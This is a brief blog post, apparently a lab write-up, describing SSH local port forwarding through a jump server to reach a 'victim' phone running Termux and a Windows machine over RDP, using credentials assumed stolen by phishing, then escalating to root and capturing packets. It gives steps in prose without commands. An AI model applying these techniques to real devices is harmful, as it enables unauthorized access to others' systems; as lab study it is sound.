I've done port forwarding experiments before, but I forgot about it after a long time, and I'm going to do it again today. For example, if the Termux application forwards the port of the victim's mobile phone to the local port of the hacker, the hacker can access his own local port and control the application of the victim's mobile phone. Taking RDP Remote Desktop as an example, the port of the victim's computer is forwarded to the local port of the hacker, and the hacker can log in to the victim's computer by accessing his own local port. Here the hacker knows the victim's username and password in advance, such as social engineering, phishing, etc.
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
Step 1: SSH forwards locally and enters the user password of the jump server
Step 2: SSH connects to the local port and enters the user password of the mobile phone
Step 3: Upgrade the permissions of the phone from ordinary users to root, there will be some pitfalls here (github download problem)
Enter rootme and we will become root, although we got the shell, and then successfully promoted from an ordinary user to a root user, but we still can't get the files in the phone, because we are still trapped in Termux~
Let's take a look at a local forwarding, here the mobile phone is replaced with a computer, and the hacker successfully logs in to the internal computer through the local forwarding and through the springboard~
Step 1: SSH forwards locally and enters the user password of the jump server
Step 2: SSH connects to the local port and enters the username and password of the computer
Step 3: The hacker successfully enters the victim's computer, but cannot be monitored, and the victim will enter the screensaver state~
Step 4: Capture and analyze packets
Scenario 1: From the local to the jump server
Scenario 2: From the jump server to the local machine
Cyber security has a long way to go, wash and sleep~
Posted on 2022-07-09 20:42